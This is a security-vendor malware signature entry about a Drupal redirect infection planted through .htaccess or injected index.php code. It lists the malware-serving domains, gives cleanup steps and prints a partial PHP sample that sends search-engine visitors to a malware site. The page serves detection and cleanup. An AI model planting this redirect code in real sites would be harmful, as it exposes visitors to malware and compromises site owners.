SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwhta9

malware-entry-mwhta9

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam). In some times a PHP code is added to the index.php to do the redirection instead.

Loads malware from:

http://alolipololi.osa.pl
http://drivegup.tk
And other domains.

Affecting:

Drupal sites.

Clean up and details

Remove offending code from .htaccess and index.php.

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

.. error_reporting(0); $nccv=headers_sent(); if (!$nccv){   $referer=$_SERVER['HTTP_REFERER'];   $ua=$_SERVER['HTTP_USER_AGENT'];   if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {         if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){                           header("Location: http://alolipololi.osa.pl/");     }